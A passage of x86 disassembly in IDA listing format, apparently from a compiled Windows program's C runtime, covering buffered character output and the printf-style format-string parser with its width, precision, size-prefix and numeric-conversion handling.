push [ebp+arg_4]
call sub_40A4CA
test eax, eax
pop ecx
jnz short loc_406966
loc_40695F: ; CODE XREF: sub_4068C4+8C�j
push esi
call sub_40A486
pop ecx
loc_406966: ; CODE XREF: sub_4068C4+74�j
; sub_4068C4+99�j
test word ptr [esi+0Ch], 108h
push edi
jz loc_4069F3
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
cmp edi, ebx
mov [esi+4], ecx
jle short loc_4069A7
push edi
push eax
push [ebp+arg_4]
call sub_40A3AA
add esp, 0Ch
mov [ebp+var_4], eax
jmp short loc_4069E9
; ---------------------------------------------------------------------------
loc_40699C: ; CODE XREF: sub_4068C4+4D�j
or eax, 20h
mov [esi+0Ch], eax
or eax, 0FFFFFFFFh
jmp short loc_406A20
; ---------------------------------------------------------------------------
loc_4069A7: ; CODE XREF: sub_4068C4+C4�j
mov ecx, [ebp+arg_4]
cmp ecx, 0FFFFFFFFh
jz short loc_4069CA
cmp ecx, 0FFFFFFFEh
jz short loc_4069CA
mov eax, ecx
and eax, 1Fh
imul eax, 38h
mov edx, ecx
sar edx, 5
add eax, dword_413A80[edx*4]
jmp short loc_4069CF
; ---------------------------------------------------------------------------
loc_4069CA: ; CODE XREF: sub_4068C4+E9�j
; sub_4068C4+EE�j
mov eax, offset dword_410EA0
loc_4069CF: ; CODE XREF: sub_4068C4+104�j
test byte ptr [eax+4], 20h
jz short loc_4069E9
push 2
push ebx
push ebx
push ecx
call sub_409CCB
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_406A0E
loc_4069E9: ; CODE XREF: sub_4068C4+D6�j
; sub_4068C4+10F�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_406A09
; ---------------------------------------------------------------------------
loc_4069F3: ; CODE XREF: sub_4068C4+A9�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_4]
call sub_40A3AA
add esp, 0Ch
mov [ebp+var_4], eax
loc_406A09: ; CODE XREF: sub_4068C4+12D�j
cmp [ebp+var_4], edi
jz short loc_406A17
loc_406A0E: ; CODE XREF: sub_4068C4+123�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp short loc_406A1F
; ---------------------------------------------------------------------------
loc_406A17: ; CODE XREF: sub_4068C4+148�j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_406A1F: ; CODE XREF: sub_4068C4+151�j
pop edi
loc_406A20: ; CODE XREF: sub_4068C4+E1�j
pop ebx
loc_406A21: ; CODE XREF: sub_4068C4+2B�j
pop esi
leave
retn
sub_4068C4 endp
; =============== S U B R O U T I N E =======================================
sub_406A24 proc near ; CODE XREF: sub_406A57+11�p
; sub_406A7B+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_406A30
cmp dword ptr [ecx+8], 0
jz short loc_406A54
loc_406A30: ; CODE XREF: sub_406A24+4�j
dec dword ptr [ecx+4]
js short loc_406A40
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_406A4C
; ---------------------------------------------------------------------------
loc_406A40: ; CODE XREF: sub_406A24+F�j
movsx eax, al
push ecx
push eax
call sub_4068C4
pop ecx
pop ecx
loc_406A4C: ; CODE XREF: sub_406A24+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_406A54
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_406A54: ; CODE XREF: sub_406A24+A�j
; sub_406A24+2B�j
inc dword ptr [esi]
retn
sub_406A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A57 proc near ; CODE XREF: sub_406AC5+852�p
; sub_406AC5+87F�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_406A72
; ---------------------------------------------------------------------------
loc_406A5F: ; CODE XREF: sub_406A57+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_406A24
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_406A78
loc_406A72: ; CODE XREF: sub_406A57+6�j
cmp [ebp+arg_4], 0
jg short loc_406A5F
loc_406A78: ; CODE XREF: sub_406A57+19�j
pop esi
pop ebp
retn
sub_406A57 endp
; =============== S U B R O U T I N E =======================================
sub_406A7B proc near ; CODE XREF: sub_406AC5+866�p
; sub_406AC5+8CD�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_406ABB
cmp dword ptr [edi+8], 0
jnz short loc_406ABB
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_406AC2
; ---------------------------------------------------------------------------
loc_406A95: ; CODE XREF: sub_406A7B+45�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_406A24
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_406ABB
call sub_403F8F
cmp dword ptr [eax], 2Ah
jnz short loc_406AC2
mov ecx, edi
mov al, 3Fh
call sub_406A24
loc_406ABB: ; CODE XREF: sub_406A7B+A�j
; sub_406A7B+10�j ...
cmp [esp+8+arg_0], 0
jg short loc_406A95
loc_406AC2: ; CODE XREF: sub_406A7B+18�j
; sub_406A7B+35�j
pop esi
pop ebx
retn
sub_406A7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1F8h
sub_406AC5 proc near ; CODE XREF: sub_4040E8+84�p
; sub_4041B4+53�p ...
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = byte ptr -25Ch
var_254 = dword ptr -254h
var_250 = byte ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_211 = byte ptr -211h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-1F8h]
sub esp, 278h
mov eax, dword_410440
xor eax, ebp
mov [ebp+1F8h+var_4], eax
mov eax, [ebp+1F8h+arg_0]
push ebx
mov ebx, [ebp+1F8h+arg_4]
push esi
xor esi, esi
push edi
mov edi, [ebp+1F8h+arg_C]
push [ebp+1F8h+arg_8]
lea ecx, [ebp+1F8h+var_25C]
mov [ebp+1F8h+var_228], eax
mov [ebp+1F8h+var_224], edi
mov [ebp+1F8h+var_244], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_218], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_23C], esi
call sub_4048C8
cmp [ebp+1F8h+var_228], esi
jnz short loc_406B52
loc_406B25: ; CODE XREF: sub_406AC5+E5�j
; sub_406AC5+138�j ...
call sub_403F8F
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
push esi
loc_406B35: ; CODE XREF: sub_406AC5+947�j
call sub_404E8B
add esp, 14h
cmp [ebp+1F8h+var_250], 0
jz short loc_406B4A
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_406B4A: ; CODE XREF: sub_406AC5+7C�j
or eax, 0FFFFFFFFh
jmp loc_407421
; ---------------------------------------------------------------------------
loc_406B52: ; CODE XREF: sub_406AC5+5E�j
mov eax, [ebp+1F8h+var_228]
test byte ptr [eax+0Ch], 40h
jnz loc_406C03
push eax
call sub_40A6C9
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406BA1
push [ebp+1F8h+var_228]
call sub_40A6C9
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406BA1
push [ebp+1F8h+var_228]
call sub_40A6C9
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:413A80h[eax*4]
call sub_40A6C9
and eax, 1Fh
imul eax, 38h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406BA6
; ---------------------------------------------------------------------------
loc_406BA1: ; CODE XREF: sub_406AC5+A4�j
; sub_406AC5+B2�j
mov eax, offset dword_410EA0
loc_406BA6: ; CODE XREF: sub_406AC5+DA�j
test byte ptr [eax+24h], 7Fh
jnz loc_406B25
push [ebp+1F8h+var_228]
call sub_40A6C9
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406BF4
push [ebp+1F8h+var_228]
call sub_40A6C9
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406BF4
push [ebp+1F8h+var_228]
call sub_40A6C9
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:413A80h[eax*4]
call sub_40A6C9
and eax, 1Fh
imul eax, 38h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406BF9
; ---------------------------------------------------------------------------
loc_406BF4: ; CODE XREF: sub_406AC5+F7�j
; sub_406AC5+105�j
mov eax, offset dword_410EA0
loc_406BF9: ; CODE XREF: sub_406AC5+12D�j
test byte ptr [eax+24h], 80h
jnz loc_406B25
loc_406C03: ; CODE XREF: sub_406AC5+94�j
cmp ebx, esi
jz loc_406B25
mov dl, [ebx]
xor ecx, ecx
test dl, dl
mov [ebp+1F8h+var_22C], esi
mov [ebp+1F8h+var_220], esi
mov [ebp+1F8h+var_24C], esi
mov [ebp+1F8h+var_211], dl
jz loc_407411
loc_406C23: ; CODE XREF: sub_406AC5+930�j
inc ebx
cmp [ebp+1F8h+var_22C], 0
mov [ebp+1F8h+var_240], ebx
jl loc_407411
mov al, dl
sub al, 20h
cmp al, 58h
ja short loc_406C4A
movsx eax, dl
movzx eax, byte_40D8A0[eax]
and eax, 0Fh
xor esi, esi
jmp short loc_406C4E
; ---------------------------------------------------------------------------
loc_406C4A: ; CODE XREF: sub_406AC5+172�j
xor esi, esi
xor eax, eax
loc_406C4E: ; CODE XREF: sub_406AC5+183�j
movsx eax, byte_40D8C0[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1F8h+var_26C], eax
ja loc_4073E1 ; default
jmp off_407439[eax*4] ; switch jump
loc_406C6E: ; DATA XREF: seg001:off_407439�o
or [ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00406C67 case 1
mov [ebp+1F8h+var_270], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_23C], esi
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406C89: ; CODE XREF: sub_406AC5+1A2�j
; DATA XREF: seg001:off_407439�o
movsx eax, dl ; jumptable 00406C67 case 2
sub eax, 20h
jz short loc_406CCF
sub eax, 3
jz short loc_406CC3
sub eax, 8
jz short loc_406CBA
dec eax
dec eax
jz short loc_406CB1
sub eax, 3
jnz loc_4073E1 ; default
or [ebp+1F8h+var_210], 8
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406CB1: ; CODE XREF: sub_406AC5+1D8�j
or [ebp+1F8h+var_210], 4
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406CBA: ; CODE XREF: sub_406AC5+1D4�j
or [ebp+1F8h+var_210], 1
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406CC3: ; CODE XREF: sub_406AC5+1CF�j
or [ebp+1F8h+var_210], 80h
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406CCF: ; CODE XREF: sub_406AC5+1CA�j
or [ebp+1F8h+var_210], 2
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406CD8: ; CODE XREF: sub_406AC5+1A2�j
; DATA XREF: seg001:off_407439�o
cmp dl, 2Ah ; jumptable 00406C67 case 3
jnz short loc_406CFD
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_238], edi
jge loc_4073E1 ; default
or [ebp+1F8h+var_210], 4
neg [ebp+1F8h+var_238]
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406CFD: ; CODE XREF: sub_406AC5+216�j
mov eax, [ebp+1F8h+var_238]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_238], eax
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D12: ; CODE XREF: sub_406AC5+1A2�j
; DATA XREF: seg001:off_407439�o
mov [ebp+1F8h+var_218], esi ; jumptable 00406C67 case 4
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D1A: ; CODE XREF: sub_406AC5+1A2�j
; DATA XREF: seg001:off_407439�o
cmp dl, 2Ah ; jumptable 00406C67 case 5
jnz short loc_406D3C
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_218], edi
jge loc_4073E1 ; default
or [ebp+1F8h+var_218], 0FFFFFFFFh
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D3C: ; CODE XREF: sub_406AC5+258�j
mov eax, [ebp+1F8h+var_218]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_218], eax
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D51: ; CODE XREF: sub_406AC5+1A2�j
; DATA XREF: seg001:off_407439�o
cmp dl, 49h ; jumptable 00406C67 case 6
jz short loc_406D9C
cmp dl, 68h
jz short loc_406D93
cmp dl, 6Ch
jz short loc_406D75
cmp dl, 77h
jnz loc_4073E1 ; default
or [ebp+1F8h+var_210], 800h
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D75: ; CODE XREF: sub_406AC5+299�j
cmp byte ptr [ebx], 6Ch
jnz short loc_406D8A
inc ebx
or [ebp+1F8h+var_210], 1000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D8A: ; CODE XREF: sub_406AC5+2B3�j
or [ebp+1F8h+var_210], 10h
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D93: ; CODE XREF: sub_406AC5+294�j
or [ebp+1F8h+var_210], 20h
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406D9C: ; CODE XREF: sub_406AC5+28F�j
mov al, [ebx]
cmp al, 36h
jnz short loc_406DB9
cmp byte ptr [ebx+1], 34h
jnz short loc_406DB9
inc ebx
inc ebx
or [ebp+1F8h+var_210], 8000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406DB9: ; CODE XREF: sub_406AC5+2DB�j
; sub_406AC5+2E1�j
cmp al, 33h
jnz short loc_406DD4
cmp byte ptr [ebx+1], 32h
jnz short loc_406DD4
inc ebx
inc ebx
and [ebp+1F8h+var_210], 0FFFF7FFFh
mov [ebp+1F8h+var_240], ebx
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406DD4: ; CODE XREF: sub_406AC5+2F6�j
; sub_406AC5+2FC�j
cmp al, 64h
jz loc_4073E1 ; default
cmp al, 69h
jz loc_4073E1 ; default
cmp al, 6Fh
jz loc_4073E1 ; default
cmp al, 75h
jz loc_4073E1 ; default
cmp al, 78h
jz loc_4073E1 ; default
cmp al, 58h
jz loc_4073E1 ; default
mov [ebp+1F8h+var_26C], esi
loc_406E07: ; CODE XREF: sub_406AC5+1A2�j
; DATA XREF: seg001:off_407439�o
lea eax, [ebp+1F8h+var_25C] ; jumptable 00406C67 case 0
push eax
movzx eax, dl
push eax
mov [ebp+1F8h+var_23C], esi
call sub_40A886
pop ecx
test eax, eax
mov al, [ebp+1F8h+var_211]
pop ecx
jz short loc_406E39
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406A24
mov al, [ebx]
inc ebx
test al, al
mov [ebp+1F8h+var_240], ebx
jz loc_4073FA
loc_406E39: ; CODE XREF: sub_406AC5+359�j
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406A24
jmp loc_4073E1 ; default
; ---------------------------------------------------------------------------
loc_406E49: ; CODE XREF: sub_406AC5+1A2�j
; DATA XREF: seg001:off_407439�o
movsx eax, dl ; jumptable 00406C67 case 7
cmp eax, 64h
jg loc_406FC7
jz loc_407046
cmp eax, 53h
jg loc_406F0F
jz short loc_406EC0
sub eax, 41h
jz short loc_406E7B
dec eax
dec eax
jz short loc_406EAF
dec eax
dec eax
jz short loc_406E7B
dec eax
dec eax
jnz loc_4072C9
loc_406E7B: ; CODE XREF: sub_406AC5+3A4�j
; sub_406AC5+3AC�j
add dl, 20h
mov [ebp+1F8h+var_270], 1
mov [ebp+1F8h+var_211], dl
loc_406E88: ; CODE XREF: sub_406AC5+459�j
; sub_406AC5+51D�j
or [ebp+1F8h+var_210], 40h
cmp [ebp+1F8h+var_218], esi
lea ebx, [ebp+1F8h+var_20C]
mov eax, 200h
mov [ebp+1F8h+var_21C], ebx
mov [ebp+1F8h+var_260], eax
jge loc_40706A
mov [ebp+1F8h+var_218], 6
jmp loc_4070B8
; ---------------------------------------------------------------------------
loc_406EAF: ; CODE XREF: sub_406AC5+3A8�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406F2C
or [ebp+1F8h+var_210], 800h
jmp short loc_406F2C
; ---------------------------------------------------------------------------
loc_406EC0: ; CODE XREF: sub_406AC5+39F�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406ECF
or [ebp+1F8h+var_210], 800h
loc_406ECF: ; CODE XREF: sub_406AC5+401�j
; sub_406AC5+694�j
mov ecx, [ebp+1F8h+var_218]
cmp ecx, 0FFFFFFFFh
jnz short loc_406EDC
mov ecx, 7FFFFFFFh
loc_406EDC: ; CODE XREF: sub_406AC5+410�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
mov [ebp+1F8h+var_21C], edi
jz loc_4072A7
cmp edi, esi
jnz short loc_406F00
mov eax, off_4107CC
mov [ebp+1F8h+var_21C], eax
loc_406F00: ; CODE XREF: sub_406AC5+431�j
mov eax, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_23C], 1
jmp loc_40729C
; ---------------------------------------------------------------------------
loc_406F0F: ; CODE XREF: sub_406AC5+399�j
sub eax, 58h
jz loc_407151
dec eax
dec eax
jz short loc_406F79
sub eax, ecx
jz loc_406E88
dec eax
dec eax
jnz loc_4072C9
loc_406F2C: ; CODE XREF: sub_406AC5+3F0�j
; sub_406AC5+3F9�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
jz short loc_406F61
movzx eax, word ptr [edi-4]
push eax
push 200h
lea eax, [ebp+1F8h+var_20C]
push eax
lea eax, [ebp+1F8h+var_220]
push eax
call sub_40A86B
add esp, 10h
test eax, eax
jz short loc_406F6E
mov [ebp+1F8h+var_248], 1
jmp short loc_406F6E
; ---------------------------------------------------------------------------
loc_406F61: ; CODE XREF: sub_406AC5+473�j
mov al, [edi-4]
mov [ebp+1F8h+var_20C], al
mov [ebp+1F8h+var_220], 1
loc_406F6E: ; CODE XREF: sub_406AC5+491�j
; sub_406AC5+49A�j
lea eax, [ebp+1F8h+var_20C]
mov [ebp+1F8h+var_21C], eax
jmp loc_4072C9
; ---------------------------------------------------------------------------
loc_406F79: ; CODE XREF: sub_406AC5+455�j
mov eax, [edi]
add edi, 4
cmp eax, esi
mov [ebp+1F8h+var_224], edi
jz short loc_406FB3
mov ecx, [eax+4]
cmp ecx, esi
jz short loc_406FB3
test word ptr [ebp+1F8h+var_210], 800h
movsx eax, word ptr [eax]
mov [ebp+1F8h+var_21C], ecx
jz short loc_406FAB
cdq
sub eax, edx
sar eax, 1
mov [ebp+1F8h+var_23C], 1
jmp loc_4072C6
; ---------------------------------------------------------------------------
loc_406FAB: ; CODE XREF: sub_406AC5+4D3�j
mov [ebp+1F8h+var_23C], esi
jmp loc_4072C6
; ---------------------------------------------------------------------------
loc_406FB3: ; CODE XREF: sub_406AC5+4BE�j
; sub_406AC5+4C5�j
mov eax, off_4107C8
mov [ebp+1F8h+var_21C], eax
push eax
loc_406FBC: ; CODE XREF: sub_406AC5+680�j
call sub_404F20
pop ecx
jmp loc_4072C6
; ---------------------------------------------------------------------------
loc_406FC7: ; CODE XREF: sub_406AC5+38A�j
cmp eax, 70h
jg loc_407156
jz loc_40714A
cmp eax, 65h
jl loc_4072C9
cmp eax, 67h
jle loc_406E88
cmp eax, 69h
jz short loc_407046
cmp eax, 6Eh
jz short loc_407011
cmp eax, 6Fh
jnz loc_4072C9
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 8
jz short loc_407051
or [ebp+1F8h+var_210], 200h
jmp short loc_407051
; ---------------------------------------------------------------------------
loc_407011: ; CODE XREF: sub_406AC5+52B�j
mov esi, [edi]
add edi, 4
mov [ebp+1F8h+var_224], edi
call sub_40A6F6
test eax, eax
jz loc_4073FA
test byte ptr [ebp+1F8h+var_210], 20h
jz short loc_407035
mov ax, word ptr [ebp+1F8h+var_22C]
mov [esi], ax
jmp short loc_40703A
; ---------------------------------------------------------------------------
loc_407035: ; CODE XREF: sub_406AC5+565�j
mov eax, [ebp+1F8h+var_22C]
mov [esi], eax
loc_40703A: ; CODE XREF: sub_406AC5+56E�j
mov [ebp+1F8h+var_248], 1
jmp loc_4073CE
; ---------------------------------------------------------------------------
loc_407046: ; CODE XREF: sub_406AC5+390�j
; sub_406AC5+526�j
or [ebp+1F8h+var_210], 40h
loc_40704A: ; CODE XREF: sub_406AC5+69C�j
mov [ebp+1F8h+var_220], 0Ah
loc_407051: ; CODE XREF: sub_406AC5+541�j
; sub_406AC5+54A�j ...
mov ecx, [ebp+1F8h+var_210]
test cx, cx
jns loc_4071A0
loc_40705D: ; CODE XREF: sub_406AC5+6E0�j
mov eax, [edi]
mov edx, [edi+4]
add edi, 8
jmp loc_4071D5
; ---------------------------------------------------------------------------
loc_40706A: ; CODE XREF: sub_406AC5+3D8�j
jnz short loc_40707A
cmp dl, 67h
jnz short loc_4070B8
mov [ebp+1F8h+var_218], 1
jmp short loc_4070B8
; ---------------------------------------------------------------------------
loc_40707A: ; CODE XREF: sub_406AC5:loc_40706A�j
cmp [ebp+1F8h+var_218], eax
jle short loc_407082
mov [ebp+1F8h+var_218], eax
loc_407082: ; CODE XREF: sub_406AC5+5B8�j
cmp [ebp+1F8h+var_218], 0A3h
jle short loc_4070B8
mov esi, [ebp+1F8h+var_218]
add esi, 15Dh
push esi
call sub_409323
test eax, eax
mov dl, [ebp+1F8h+var_211]
pop ecx
mov [ebp+1F8h+var_24C], eax
jz short loc_4070AF
mov [ebp+1F8h+var_21C], eax
mov [ebp+1F8h+var_260], esi
mov ebx, eax
jmp short loc_4070B6
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406AC5+5DE�j
mov [ebp+1F8h+var_218], 0A3h
loc_4070B6: ; CODE XREF: sub_406AC5+5E8�j
xor esi, esi
loc_4070B8: ; CODE XREF: sub_406AC5+3E5�j
; sub_406AC5+5AA�j ...
mov eax, [edi]
add edi, 8
mov [ebp+1F8h+var_278], eax
mov eax, [edi-4]
mov [ebp+1F8h+var_274], eax
lea eax, [ebp+1F8h+var_25C]
push eax
push [ebp+1F8h+var_270]
movsx eax, dl
push [ebp+1F8h+var_218]
mov [ebp+1F8h+var_224], edi
push eax
push [ebp+1F8h+var_260]
lea eax, [ebp+1F8h+var_278]
push ebx
push eax
push off_4107E8
call sub_4062CC
pop ecx
call eax
mov edi, [ebp+1F8h+var_210]
add esp, 1Ch
and edi, 80h
jz short loc_407115
cmp [ebp+1F8h+var_218], esi
jnz short loc_407115
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push off_4107F4
call sub_4062CC
pop ecx
call eax
pop ecx
pop ecx
loc_407115: ; CODE XREF: sub_406AC5+634�j
; sub_406AC5+639�j
cmp [ebp+1F8h+var_211], 67h
jnz short loc_407134
cmp edi, esi
jnz short loc_407134
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push off_4107F0
call sub_4062CC
pop ecx
call eax
pop ecx
pop ecx
loc_407134: ; CODE XREF: sub_406AC5+654�j
; sub_406AC5+658�j
cmp byte ptr [ebx], 2Dh
jnz short loc_407144
or [ebp+1F8h+var_210], 100h
inc ebx
mov [ebp+1F8h+var_21C], ebx
loc_407144: ; CODE XREF: sub_406AC5+672�j
push ebx
jmp loc_406FBC
; ---------------------------------------------------------------------------
loc_40714A: ; CODE XREF: sub_406AC5+50B�j
mov [ebp+1F8h+var_218], 8
loc_407151: ; CODE XREF: sub_406AC5+44D�j
mov [ebp+1F8h+var_244], ecx
jmp short loc_407177
; ---------------------------------------------------------------------------
loc_407156: ; CODE XREF: sub_406AC5+505�j
sub eax, 73h
jz loc_406ECF
dec eax
dec eax
jz loc_40704A
sub eax, 3
jnz loc_4072C9
mov [ebp+1F8h+var_244], 27h
loc_407177: ; CODE XREF: sub_406AC5+68F�j
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 10h
jz loc_407051
mov al, byte ptr [ebp+1F8h+var_244]
add al, 51h
mov [ebp+1F8h+var_230], 30h
mov [ebp+1F8h+var_22F], al
mov [ebp+1F8h+var_234], 2
jmp loc_407051
; ---------------------------------------------------------------------------
loc_4071A0: ; CODE XREF: sub_406AC5+592�j
test cx, 1000h
jnz loc_40705D
add edi, 4
test cl, 20h
jz short loc_4071C8
test cl, 40h
mov [ebp+1F8h+var_224], edi
jz short loc_4071C1
movsx eax, word ptr [edi-4]
jmp short loc_4071C5
; ---------------------------------------------------------------------------
loc_4071C1: ; CODE XREF: sub_406AC5+6F4�j
movzx eax, word ptr [edi-4]
loc_4071C5: ; CODE XREF: sub_406AC5+6FA�j
cdq
jmp short loc_4071D8
; ---------------------------------------------------------------------------
loc_4071C8: ; CODE XREF: sub_406AC5+6EC�j
test cl, 40h
mov eax, [edi-4]
jz short loc_4071D3
cdq
jmp short loc_4071D5
; ---------------------------------------------------------------------------
loc_4071D3: ; CODE XREF: sub_406AC5+709�j
xor edx, edx
loc_4071D5: ; CODE XREF: sub_406AC5+5A0�j
; sub_406AC5+70C�j
mov [ebp+1F8h+var_224], edi
loc_4071D8: ; CODE XREF: sub_406AC5+701�j
test cl, 40h
jz short loc_4071F5
cmp edx, esi
jg short loc_4071F5
jl short loc_4071E7
cmp eax, esi
jnb short loc_4071F5
loc_4071E7: ; CODE XREF: sub_406AC5+71C�j
neg eax
adc edx, 0
neg edx
or [ebp+1F8h+var_210], 100h
loc_4071F5: ; CODE XREF: sub_406AC5+716�j
; sub_406AC5+71A�j ...
test word ptr [ebp+1F8h+var_210], 9000h
mov ebx, edx
mov edi, eax
jnz short loc_407203
xor ebx, ebx
loc_407203: ; CODE XREF: sub_406AC5+73A�j
cmp [ebp+1F8h+var_218], 0
jge short loc_407212
mov [ebp+1F8h+var_218], 1
jmp short loc_407223
; ---------------------------------------------------------------------------
loc_407212: ; CODE XREF: sub_406AC5+742�j
and [ebp+1F8h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1F8h+var_218], eax
jle short loc_407223
mov [ebp+1F8h+var_218], eax
loc_407223: ; CODE XREF: sub_406AC5+74B�j
; sub_406AC5+759�j
mov eax, edi
or eax, ebx
jnz short loc_40722C
and [ebp+1F8h+var_234], eax
loc_40722C: ; CODE XREF: sub_406AC5+762�j
lea esi, [ebp+1F8h+var_D]
loc_407232: ; CODE XREF: sub_406AC5+79F�j
mov eax, [ebp+1F8h+var_218]
dec [ebp+1F8h+var_218]
test eax, eax
jg short loc_407242
mov eax, edi
or eax, ebx
jz short loc_407266
loc_407242: ; CODE XREF: sub_406AC5+775�j
mov eax, [ebp+1F8h+var_220]
cdq
push edx
push eax
push ebx
push edi
call sub_40A8D0
add ecx, 30h
cmp ecx, 39h
mov [ebp+1F8h+var_260], ebx
mov edi, eax
mov ebx, edx
jle short loc_407261
add ecx, [ebp+1F8h+var_244]
loc_407261: ; CODE XREF: sub_406AC5+797�j
mov [esi], cl
dec esi
jmp short loc_407232
; ---------------------------------------------------------------------------
loc_407266: ; CODE XREF: sub_406AC5+77B�j
lea eax, [ebp+1F8h+var_D]
sub eax, esi
inc esi
test word ptr [ebp+1F8h+var_210], 200h
mov [ebp+1F8h+var_220], eax
mov [ebp+1F8h+var_21C], esi
jz short loc_4072C9
test eax, eax
jz short loc_407288
mov ecx, esi
cmp byte ptr [ecx], 30h
jz short loc_4072C9
loc_407288: ; CODE XREF: sub_406AC5+7BA�j
dec [ebp+1F8h+var_21C]
mov ecx, [ebp+1F8h+var_21C]
mov byte ptr [ecx], 30h
inc eax
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_407294: ; CODE XREF: sub_406AC5+7D9�j
dec ecx
cmp [eax], si
jz short loc_4072A0
inc eax
inc eax
loc_40729C: ; CODE XREF: sub_406AC5+445�j
